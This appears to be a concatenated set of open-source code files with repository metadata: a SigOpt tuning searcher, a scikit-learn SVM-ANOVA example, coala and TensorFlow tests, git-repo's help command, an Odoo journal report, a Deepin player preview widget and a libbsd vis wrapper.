mode == "max": self._metric_op = 1. elif mode == "min": self._metric_op = -1. self._live_trial_mapping = {} # Create a connection with SigOpt API, requires API key self.conn = sgo.Connection(client_token=os.environ["SIGOPT_KEY"]) self.experiment = self.conn.experiments().create( name=name, parameters=space, parallel_bandwidth=self._max_concurrent, ) super(SigOptSearch, self).__init__(**kwargs) def _suggest(self, trial_id): if self._num_live_trials() >= self._max_concurrent: return None # Get new suggestion from SigOpt suggestion = self.conn.experiments( self.experiment.id).suggestions().create() self._live_trial_mapping[trial_id] = suggestion return copy.deepcopy(suggestion.assignments) def on_trial_result(self, trial_id, result): pass def on_trial_complete(self, trial_id, result=None, error=False, early_terminated=False): """Notification for the completion of trial. If a trial fails, it will be reported as a failed Observation, telling the optimizer that the Suggestion led to a metric failure, which updates the feasible region and improves parameter recommendation. Creates SigOpt Observation object for trial. 
""" if result: self.conn.experiments(self.experiment.id).observations().create( suggestion=self._live_trial_mapping[trial_id].id, value=self._metric_op * result[self._metric], ) # Update the experiment object self.experiment = self.conn.experiments(self.experiment.id).fetch() elif error or early_terminated: # Reports a failed Observation self.conn.experiments(self.experiment.id).observations().create( failed=True, suggestion=self._live_trial_mapping[trial_id].id) del self._live_trial_mapping[trial_id] def _num_live_trials(self): return len(self._live_trial_mapping) def save(self, checkpoint_dir): trials_object = (self.conn, self.experiment) with open(checkpoint_dir, "wb") as outputFile: pickle.dump(trials_object, outputFile) def restore(self, checkpoint_dir): with open(checkpoint_dir, "rb") as inputFile: trials_object = pickle.load(inputFile) self.conn = trials_object[0] self.experiment = trials_object[1]
license: apache-2.0
repo_name: aetilley/scikit-learn
path: examples/svm/plot_svm_anova.py
copies: 250
size: 2000
content:
""" ================================================= SVM-Anova: SVM with univariate feature selection ================================================= This example shows how to perform univariate feature before running a SVC (support vector classifier) to improve the classification scores. """ print(__doc__) import numpy as np import matplotlib.pyplot as plt from sklearn import svm, datasets, feature_selection, cross_validation from sklearn.pipeline import Pipeline ############################################################################### # Import some data to play with digits = datasets.load_digits() y = digits.target # Throw away data, to be in the curse of dimension settings y = y[:200] X = digits.data[:200] n_samples = len(y) X = X.reshape((n_samples, -1)) # add 200 non-informative features X = np.hstack((X, 2 * np.random.random((n_samples, 200)))) ############################################################################### # Create a feature-selection transform and an instance of SVM that we # combine together to have an full-blown estimator transform = feature_selection.SelectPercentile(feature_selection.f_classif) clf = Pipeline([('anova', transform), ('svc', svm.SVC(C=1.0))]) ############################################################################### # Plot the cross-validation score as a function of percentile of features score_means = list() score_stds = list() percentiles = (1, 3, 6, 10, 15, 20, 30, 40, 60, 80, 100) for percentile in percentiles: clf.set_params(anova__percentile=percentile) # Compute cross-validation score using all CPUs this_scores = cross_validation.cross_val_score(clf, X, y, n_jobs=1) score_means.append(this_scores.mean()) score_stds.append(this_scores.std()) plt.errorbar(percentiles, score_means, np.array(score_stds)) plt.title( 'Performance of the SVM-Anova varying the percentile of features selected') plt.xlabel('Percentile') plt.ylabel('Prediction rate') plt.axis('tight') plt.show()
license: bsd-3-clause
repo_name: dagdaggo/coala
path: tests/bearlib/spacing/SpacingHelperTest.py
copies: 26
size: 4341
content:
import unittest from coalib.bearlib.spacing.SpacingHelper import SpacingHelper from coalib.settings.Section import Section class SpacingHelperTest(unittest.TestCase): def setUp(self): self.uut = SpacingHelper() def test_needed_settings(self): self.assertEqual(list(self.uut.get_optional_settings()), ["tab_width"]) self.assertEqual(list(self.uut.get_non_optional_settings()), []) def test_construction(self): section = Section("test section") self.assertRaises(TypeError, SpacingHelper, "no integer") self.assertRaises(TypeError, self.uut.from_section, 5) self.assertEqual(self.uut.tab_width, self.uut.from_section(section).tab_width) # This is assumed in some tests. If you want to change this value, be # sure to change the tests too self.assertEqual(self.uut.DEFAULT_TAB_WIDTH, 4) self.assertEqual(self.uut.tab_width, self.uut.DEFAULT_TAB_WIDTH) def test_get_indentation(self): self.assertRaises(TypeError, self.uut.get_indentation, 5) self.assertEqual(self.uut.get_indentation("no indentation"), 0) self.assertEqual(self.uut.get_indentation(" indentation"), 1) self.assertEqual(self.uut.get_indentation(" indentation"), 2) self.assertEqual(self.uut.get_indentation("\tindentation"), self.uut.DEFAULT_TAB_WIDTH) # Having a space before the tab shouldn't make any difference self.assertEqual(self.uut.get_indentation(" \tindentation"), self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.get_indentation(" \t indentation"), self.uut.DEFAULT_TAB_WIDTH+1) self.assertEqual(self.uut.get_indentation("\t indentation"), self.uut.DEFAULT_TAB_WIDTH+1) # same tests but with indentation only self.assertEqual(self.uut.get_indentation("\t"), self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.get_indentation(" \t"), self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.get_indentation(" \t "), self.uut.DEFAULT_TAB_WIDTH+1) self.assertEqual(self.uut.get_indentation("\t "), self.uut.DEFAULT_TAB_WIDTH+1) self.assertEqual(self.uut.get_indentation("\t\t"), self.uut.DEFAULT_TAB_WIDTH*2) def test_replace_tabs_with_spaces(self): self.assertRaises(TypeError, self.uut.replace_tabs_with_spaces, 5) self.assertEqual(self.uut.replace_tabs_with_spaces(""), "") self.assertEqual(self.uut.replace_tabs_with_spaces(" "), " ") self.assertEqual(self.uut.replace_tabs_with_spaces("\t"), " "*self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.replace_tabs_with_spaces("\t\t"), " "*self.uut.DEFAULT_TAB_WIDTH*2) self.assertEqual(self.uut.replace_tabs_with_spaces(" \t"), " "*self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.replace_tabs_with_spaces(" \t"), " "*self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.replace_tabs_with_spaces("d \t "), "d" + " "*self.uut.DEFAULT_TAB_WIDTH) def test_replace_spaces_with_tabs(self): self.assertRaises(TypeError, self.uut.replace_spaces_with_tabs, 5) self.assertEqual(self.uut.replace_spaces_with_tabs(""), "") self.assertEqual(self.uut.replace_spaces_with_tabs(" "), " ") self.assertEqual(self.uut.replace_spaces_with_tabs(" "), "\t") self.assertEqual(self.uut.replace_spaces_with_tabs(" \t"), "\t") self.assertEqual(self.uut.replace_spaces_with_tabs(" dd "), " dd ") self.assertEqual(self.uut.replace_spaces_with_tabs(" dd d "), " dd d ") # One space shouldnt be replaced self.assertEqual(self.uut.replace_spaces_with_tabs(" dd "), " dd\t") self.assertEqual( self.uut.replace_spaces_with_tabs(" \t a_text another"), "\t a_text\tanother") self.assertEqual(self.uut.replace_spaces_with_tabs("d d"), "d d")
license: agpl-3.0
repo_name: hanchentech/git-repo
path: subcmds/help.py
copies: 48
size: 4794
content:
# # Copyright (C) 2008 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import re import sys from formatter import AbstractFormatter, DumbWriter from color import Coloring from command import PagedCommand, MirrorSafeCommand class Help(PagedCommand, MirrorSafeCommand): common = False helpSummary = "Display detailed help on a command" helpUsage = """ %prog [--all|command] """ helpDescription = """ Displays detailed usage information about a command. """ def _PrintAllCommands(self): print 'usage: repo COMMAND [ARGS]' print """ The complete list of recognized repo commands are: """ commandNames = self.commands.keys() commandNames.sort() maxlen = 0 for name in commandNames: maxlen = max(maxlen, len(name)) fmt = ' %%-%ds %%s' % maxlen for name in commandNames: command = self.commands[name] try: summary = command.helpSummary.strip() except AttributeError: summary = '' print fmt % (name, summary) print """ See 'repo help <command>' for more information on a specific command. """ def _PrintCommonCommands(self): print 'usage: repo COMMAND [ARGS]' print """ The most commonly used repo commands are: """ commandNames = [name for name in self.commands.keys() if self.commands[name].common] commandNames.sort() maxlen = 0 for name in commandNames: maxlen = max(maxlen, len(name)) fmt = ' %%-%ds %%s' % maxlen for name in commandNames: command = self.commands[name] try: summary = command.helpSummary.strip() except AttributeError: summary = '' print fmt % (name, summary) print """ See 'repo help <command>' for more information on a specific command. See 'repo help --all' for a complete list of recognized commands. 
""" def _PrintCommandHelp(self, cmd): class _Out(Coloring): def __init__(self, gc): Coloring.__init__(self, gc, 'help') self.heading = self.printer('heading', attr='bold') self.wrap = AbstractFormatter(DumbWriter()) def _PrintSection(self, heading, bodyAttr): try: body = getattr(cmd, bodyAttr) except AttributeError: return if body == '' or body is None: return self.nl() self.heading('%s', heading) self.nl() self.heading('%s', ''.ljust(len(heading), '-')) self.nl() me = 'repo %s' % cmd.NAME body = body.strip() body = body.replace('%prog', me) asciidoc_hdr = re.compile(r'^\n?([^\n]{1,})\n([=~-]{2,})$') for para in body.split("\n\n"): if para.startswith(' '): self.write('%s', para) self.nl() self.nl() continue m = asciidoc_hdr.match(para) if m: title = m.group(1) section_type = m.group(2) if section_type[0] in ('=', '-'): p = self.heading else: def _p(fmt, *args): self.write(' ') self.heading(fmt, *args) p = _p p('%s', title) self.nl() p('%s', ''.ljust(len(title),section_type[0])) self.nl() continue self.wrap.add_flowing_data(para) self.wrap.end_paragraph(1) self.wrap.end_paragraph(0) out = _Out(self.manifest.globalConfig) out._PrintSection('Summary', 'helpSummary') cmd.OptionParser.print_help() out._PrintSection('Description', 'helpDescription') def _Options(self, p): p.add_option('-a', '--all', dest='show_all', action='store_true', help='show the complete list of commands') def Execute(self, opt, args): if len(args) == 0: if opt.show_all: self._PrintAllCommands() else: self._PrintCommonCommands() elif len(args) == 1: name = args[0] try: cmd = self.commands[name] except KeyError: print >>sys.stderr, "repo: '%s' is not a repo command." % name sys.exit(1) cmd.manifest = self.manifest self._PrintCommandHelp(cmd) else: self._PrintCommandHelp(self)
license: apache-2.0
repo_name: CubicERP/odoo
path: addons/account/report/account_journal.py
copies: 255
size: 10035
content:
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from openerp.osv import osv from openerp.report import report_sxw from common_report_header import common_report_header class journal_print(report_sxw.rml_parse, common_report_header): def __init__(self, cr, uid, name, context=None): if context is None: context = {} super(journal_print, self).__init__(cr, uid, name, context=context) self.context = context self.period_ids = [] self.last_move_id = False self.journal_ids = [] self.sort_selection = 'am.name' self.localcontext.update({ 'time': time, 'lines': self.lines, 'sum_debit': self._sum_debit, 'sum_credit': self._sum_credit, 'get_start_period': self.get_start_period, 'get_end_period': self.get_end_period, 'get_account': self._get_account, 'get_filter': self._get_filter, 'get_start_date': self._get_start_date, 'get_end_date': self._get_end_date, 'get_fiscalyear': self._get_fiscalyear, 'display_currency':self._display_currency, 'get_sortby': self._get_sortby, 'get_target_move': self._get_target_move, 'check_last_move_id': self.check_last_move_id, 'set_last_move_id': self.set_last_move_id, 'tax_codes': self.tax_codes, 'sum_vat': self._sum_vat, }) def set_context(self, objects, data, ids, report_type=None): obj_move = self.pool.get('account.move.line') new_ids = ids self.query_get_clause = '' self.target_move = data['form'].get('target_move', 'all') if (data['model'] == 'ir.ui.menu'): self.period_ids = tuple(data['form']['periods']) self.journal_ids = tuple(data['form']['journal_ids']) new_ids = data['form'].get('active_ids', []) self.query_get_clause = 'AND ' self.query_get_clause += obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context', {})) self.sort_selection = data['form'].get('sort_selection', 'date') objects = self.pool.get('account.journal.period').browse(self.cr, self.uid, new_ids) elif new_ids: #in case of direct access from account.journal.period object, we need to set the journal_ids and periods_ids self.cr.execute('SELECT period_id, journal_id FROM account_journal_period WHERE id IN %s', (tuple(new_ids),)) res = self.cr.fetchall() self.period_ids, self.journal_ids = zip(*res) return super(journal_print, self).set_context(objects, data, ids, report_type=report_type) def set_last_move_id(self, move_id): self.last_move_id = move_id def check_last_move_id(self, move_id): ''' return True if we need to draw a gray line above this line, used to separate moves ''' if self.last_move_id: return not(self.last_move_id == move_id) return False def tax_codes(self, period_id, journal_id): ids_journal_period = self.pool.get('account.journal.period').search(self.cr, self.uid, 
[('journal_id', '=', journal_id), ('period_id', '=', period_id)]) self.cr.execute( 'select distinct tax_code_id from account_move_line ' \ 'where period_id=%s and journal_id=%s and tax_code_id is not null and state<>\'draft\'', (period_id, journal_id) ) ids = map(lambda x: x[0], self.cr.fetchall()) tax_code_ids = [] if ids: self.cr.execute('select id from account_tax_code where id in %s order by code', (tuple(ids),)) tax_code_ids = map(lambda x: x[0], self.cr.fetchall()) tax_codes = self.pool.get('account.tax.code').browse(self.cr, self.uid, tax_code_ids) return tax_codes def _sum_vat(self, period_id, journal_id, tax_code_id): self.cr.execute('select sum(tax_amount) from account_move_line where ' \ 'period_id=%s and journal_id=%s and tax_code_id=%s and state<>\'draft\'', (period_id, journal_id, tax_code_id)) return self.cr.fetchone()[0] or 0.0 def _sum_debit(self, period_id=False, journal_id=False): if journal_id and isinstance(journal_id, int): journal_id = [journal_id] if period_id and isinstance(period_id, int): period_id = [period_id] if not journal_id: journal_id = self.journal_ids if not period_id: period_id = self.period_ids if not (period_id and journal_id): return 0.0 move_state = ['draft','posted'] if self.target_move == 'posted': move_state = ['posted'] self.cr.execute('SELECT SUM(debit) FROM account_move_line l, account_move am ' 'WHERE l.move_id=am.id AND am.state IN %s AND l.period_id IN %s AND l.journal_id IN %s ' + self.query_get_clause + ' ', (tuple(move_state), tuple(period_id), tuple(journal_id))) return self.cr.fetchone()[0] or 0.0 def _sum_credit(self, period_id=False, journal_id=False): if journal_id and isinstance(journal_id, int): journal_id = [journal_id] if period_id and isinstance(period_id, int): period_id = [period_id] if not journal_id: journal_id = self.journal_ids if not period_id: period_id = self.period_ids if not (period_id and journal_id): return 0.0 move_state = ['draft','posted'] if self.target_move == 'posted': move_state = ['posted'] self.cr.execute('SELECT SUM(l.credit) FROM account_move_line l, account_move am ' 'WHERE l.move_id=am.id AND am.state IN %s AND l.period_id IN %s AND l.journal_id IN %s '+ self.query_get_clause+'', (tuple(move_state), tuple(period_id), tuple(journal_id))) return self.cr.fetchone()[0] or 0.0 def lines(self, period_id, journal_id=False): if not journal_id: journal_id = self.journal_ids else: journal_id = [journal_id] obj_mline = self.pool.get('account.move.line') self.cr.execute('update account_journal_period set state=%s where journal_id IN %s and period_id=%s and state=%s', ('printed', self.journal_ids, period_id, 'draft')) self.pool.get('account.journal.period').invalidate_cache(self.cr, self.uid, ['state'], context=self.context) move_state = ['draft','posted'] if self.target_move == 'posted': move_state = ['posted'] self.cr.execute('SELECT l.id FROM account_move_line l, account_move am WHERE l.move_id=am.id AND am.state IN %s AND l.period_id=%s AND l.journal_id IN %s ' + self.query_get_clause + ' ORDER BY '+ self.sort_selection + ', l.move_id',(tuple(move_state), period_id, tuple(journal_id) )) ids = map(lambda x: x[0], self.cr.fetchall()) return obj_mline.browse(self.cr, self.uid, ids) def _set_get_account_currency_code(self, account_id): self.cr.execute("SELECT c.symbol AS code "\ "FROM res_currency c,account_account AS ac "\ "WHERE ac.id = %s AND ac.currency_id = c.id" % (account_id)) result = self.cr.fetchone() if result: self.account_currency = result[0] else: self.account_currency = False def 
_get_fiscalyear(self, data): if data['model'] == 'account.journal.period': return self.pool.get('account.journal.period').browse(self.cr, self.uid, data['id']).fiscalyear_id.name return super(journal_print, self)._get_fiscalyear(data) def _get_account(self, data): if data['model'] == 'account.journal.period': return self.pool.get('account.journal.period').browse(self.cr, self.uid, data['id']).company_id.name return super(journal_print, self)._get_account(data) def _display_currency(self, data): if data['model'] == 'account.journal.period': return True return data['form']['amount_currency'] def _get_sortby(self, data): # TODO: deprecated, to remove in trunk if self.sort_selection == 'date': return self._translate('Date') elif self.sort_selection == 'ref': return self._translate('Reference Number') return self._translate('Date') class report_journal(osv.AbstractModel): _name = 'report.account.report_journal' _inherit = 'report.abstract_report' _template = 'account.report_journal' _wrapped_report_class = journal_print class report_salepurchasejournal(osv.AbstractModel): _name = 'report.account.report_salepurchasejournal' _inherit = 'report.abstract_report' _template = 'account.report_salepurchasejournal' _wrapped_report_class = journal_print # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
license: agpl-3.0
repo_name: hailongqiu/new-deepin-media-player
path: src/widget/preview.py
copies: 2
size: 6604
content:
#! /usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2012 Deepin, Inc. # 2012 Hailong Qiu # # Author: Hailong Qiu <[email protected]> # Maintainer: Hailong Qiu <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from dtk.ui.draw import draw_text from dtk.ui.constant import DEFAULT_FONT_SIZE from preview_bg import PreViewWin from mplayer.player import LDMP from mplayer.player import length_to_time from constant import PREVIEW_PV_WIDTH, PREVIEW_PV_HEIGHT import gtk import cairo import pango class PreView(object): def __init__(self, path = "", pos = 0): self.video_width = 0 self.video_height = 0 #self.mp = Mplayer() self.mp = LDMP() self.xid = None self.pos = pos # Preview background window. self.bg = PreViewWin() self.bg.set_size_request(124, 89) self.bg.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_MENU) # Set background window. self.bg.add_events(gtk.gdk.ALL_EVENTS_MASK) #self.bg.show_all() self.bg.set_offset(self.bg.get_offset_mid_value()) # Hide preview window. self.bg.show_time_label.connect("expose-event", self.draw_background) self.bg.connect("motion-notify-event", self.motion_hide_preview) self.bg.connect("enter-notify-event", self.motion_hide_preview) # Preview window. self.pv = gtk.Window(gtk.WINDOW_POPUP) # Set preview window. self.pv.set_size_request(PREVIEW_PV_WIDTH - 4, PREVIEW_PV_HEIGHT) self.pv.set_decorated(False) self.pv.set_keep_above(True) self.pv.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_MENU) self.pv.add_events(gtk.gdk.ALL_EVENTS_MASK) self.pv.connect("expose-event", self.draw_preview_video_background) # Hide preview window. self.pv.connect("motion-notify-event", self.motion_hide_preview) self.pv.connect("enter-notify-event", self.motion_hide_preview) def draw_preview_video_background(self, widget, event): cr = widget.window.cairo_create() x, y, w, h = widget.get_allocation() cr.rectangle(x, y, w, h) cr.fill() if self.video_width or self.video_height: video_ratio = float(self.video_width) / self.video_height bit = video_ratio - (float(w) / h) cr.set_source_rgb(0, 0, 0) if 0 == bit: return False elif bit < 0: s = w - h * (video_ratio) s = s / 2 # Draw left. cr.rectangle(x, y, s, h) cr.fill() # Draw right. cr.rectangle(x + s + h * video_ratio, y, s, h) cr.fill() elif bit > 0: video_ratio = float(self.video_height) / self.video_width s = h - w * video_ratio s = s / 2 # Draw UP. cr.rectangle(x, y, w + 1, s) cr.fill() # Draw bottom. cr.rectangle(x, y + s + w * (video_ratio), w, s) cr.fill() return True # Background window. def draw_background(self, widget, event): # Init. cr = widget.window.cairo_create() rect = widget.allocation x, y, w, h = rect.x, rect.y, rect.width, rect.height # Draw preview time. 
font_height_padding = 15 show_time_text = length_to_time(self.pos) time_hour, time_min, time_sec = 1, 3, 30 #self.mp.time(self.pos) draw_text(cr, #"%s:%s:%s" % (self.time_to_string(time_hour), self.time_to_string(time_min), self.time_to_string(time_sec)), show_time_text, x, h - font_height_padding, w, DEFAULT_FONT_SIZE, text_color = "#ffffff", alignment=pango.ALIGN_CENTER ) return True def move_preview(self, x, y): self.bg.move(int(x), int(y)) self.pv.move(int(x + 4), int(y+4)) def show_preview(self, pos): if self.pos != pos: self.pos = pos self.bg.queue_draw() self.bg.show_all() self.pv.show_all() region = gtk.gdk.Region() self.bg.window.input_shape_combine_region(region, 0, 0) #self.pv.show_all() self.pv.set_keep_above(True) # init preview window mplayer. self.init_mplayer_window(pos) def hide_preview(self): self.bg.hide_all() self.pv.hide_all() def quit_preview_player(self): self.hide_preview() self.mp.quit() def set_preview_path(self, path): self.pv.show_all() self.pv.set_opacity(0) self.mp.xid = self.pv.window.xid self.mp.quit() self.mp.player.uri = path self.mp.play() # 播放. self.mp.pause() # 暂停. self.mp.nomute() # 静音. self.pv.hide_all() self.pv.set_opacity(1) def time_to_string(self, time_pos): if 0<= time_pos <= 9: return "0" + str(time_pos) return str(time_pos) def motion_hide_preview(self, widget, event): self.hide_preview() def init_mplayer_window(self, pos): # 预览快进. self.mp.seek(pos) if __name__ == "__main__": pass
license: gpl-3.0
repo_name: wqer1019/student-work
path: vendor/psy/psysh/test/tools/vis.py
copies: 710
size: 3428
content:
""" vis.py ====== Ctypes based module to access libbsd's strvis & strunvis functions. The `vis` function is the equivalent of strvis. The `unvis` function is the equivalent of strunvis. All functions accept unicode string as input and return a unicode string. Constants: ---------- * to select alternate encoding format `VIS_OCTAL`: use octal \ddd format `VIS_CSTYLE`: use \[nrft0..] where appropiate * to alter set of characters encoded (default is to encode all non-graphic except space, tab, and newline). `VIS_SP`: also encode space `VIS_TAB`: also encode tab `VIS_NL`: also encode newline `VIS_WHITE`: same as (VIS_SP | VIS_TAB | VIS_NL) `VIS_SAFE`: only encode "unsafe" characters * other `VIS_NOSLASH`: inhibit printing '\' `VIS_HTTP1808`: http-style escape % hex hex `VIS_HTTPSTYLE`: http-style escape % hex hex `VIS_MIMESTYLE`: mime-style escape = HEX HEX `VIS_HTTP1866`: http-style &#num; or &string; `VIS_NOESCAPE`: don't decode `\' `VIS_GLOB`: encode glob(3) magic characters :Authors: - ju1ius (http://github.com/ju1ius) :Version: 1 :Date: 2014-01-05 """ from ctypes import CDLL, c_char_p, c_int from ctypes.util import find_library __all__ = [ 'vis', 'unvis', 'VIS_OCTAL', 'VIS_CSTYLE', 'VIS_SP', 'VIS_TAB', 'VIS_NL', 'VIS_WHITE', 'VIS_SAFE', 'VIS_NOSLASH', 'VIS_HTTP1808', 'VIS_HTTPSTYLE', 'VIS_MIMESTYLE', 'VIS_HTTP1866', 'VIS_NOESCAPE', 'VIS_GLOB' ] ############################################################# # Constants from bsd/vis.h ############################################################# #to select alternate encoding format VIS_OCTAL = 0x0001 VIS_CSTYLE = 0x0002 # to alter set of characters encoded # (default is to encode all non-graphic except space, tab, and newline). VIS_SP = 0x0004 VIS_TAB = 0x0008 VIS_NL = 0x0010 VIS_WHITE = VIS_SP | VIS_TAB | VIS_NL VIS_SAFE = 0x0020 # other VIS_NOSLASH = 0x0040 VIS_HTTP1808 = 0x0080 VIS_HTTPSTYLE = 0x0080 VIS_MIMESTYLE = 0x0100 VIS_HTTP1866 = 0x0200 VIS_NOESCAPE = 0x0400 VIS_GLOB = 0x1000 ############################################################# # Import libbsd/vis functions ############################################################# _libbsd = CDLL(find_library('bsd')) _strvis = _libbsd.strvis _strvis.argtypes = [c_char_p, c_char_p, c_int] _strvis.restype = c_int _strunvis = _libbsd.strunvis _strvis.argtypes = [c_char_p, c_char_p] _strvis.restype = c_int def vis(src, flags=VIS_WHITE): """ Encodes the string `src` into libbsd's vis encoding. `flags` must be one of the VIS_* constants C definition: int strvis(char *dst, char *src, int flags); """ src = bytes(src, 'utf-8') dst_p = c_char_p(bytes(len(src) * 4)) src_p = c_char_p(src) flags = c_int(flags) bytes_written = _strvis(dst_p, src_p, flags) if -1 == bytes_written: raise RuntimeError('vis failed to encode string "{}"'.format(src)) return dst_p.value.decode('utf-8') def unvis(src): """ Decodes a string encoded by vis. C definition: int strunvis(char *dst, char *src); """ src = bytes(src, 'utf-8') dst_p = c_char_p(bytes(len(src))) src_p = c_char_p(src) bytes_written = _strunvis(dst_p, src_p) if -1 == bytes_written: raise RuntimeError('unvis failed to decode string "{}"'.format(src)) return dst_p.value.decode('utf-8')
mit
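A minimal usage sketch for the two helpers above, assuming libbsd is installed (so find_library('bsd') resolves) and the file is importable as vis; both assumptions go beyond what the record itself shows.

from vis import vis, unvis, VIS_WHITE

encoded = vis("tab\tnewline\n", flags=VIS_WHITE)  # whitespace comes back as backslash escape sequences
decoded = unvis(encoded)
assert decoded == "tab\tnewline\n"                # the round-trip restores the original string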
koobonil/Boss2D
Boss2D/addon/tensorflow-1.2.1_for_boss/tensorflow/python/util/deprecation_test.py
17
28084
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """tensor_util tests.""" # pylint: disable=unused-import from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.platform import test from tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import deprecation class DeprecationTest(test.TestCase): def _assert_subset(self, expected_subset, actual_set): self.assertTrue( actual_set.issuperset(expected_subset), msg="%s is not a superset of %s." % (actual_set, expected_subset)) def test_deprecated_illegal_args(self): instructions = "This is how you update..." with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated("", instructions) with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated("07-04-2016", instructions) date = "2016-07-04" with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated(date, None) with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated(date, "") @test.mock.patch.object(logging, "warning", autospec=True) def test_no_date(self, mock_warning): date = None instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. Returns: Sum of args. """ return arg0 + arg1 self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed in a future version." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n" "\nReturns:" "\n Sum of args." % instructions, _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches( args[0], r"deprecated and will be removed") self._assert_subset(set(["in a future version", instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. Returns: Sum of args. """ return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n" "\nReturns:" "\n Sum of args." % (date, instructions), _fn.__doc__) # Assert calling new fn issues log warning. 
self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): """fn doc.""" return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "DEPRECATED FUNCTION" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_instance_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @deprecation.deprecated(date, instructions) def _fn(self, arg0, arg1): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. Returns: Sum of args. """ return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." 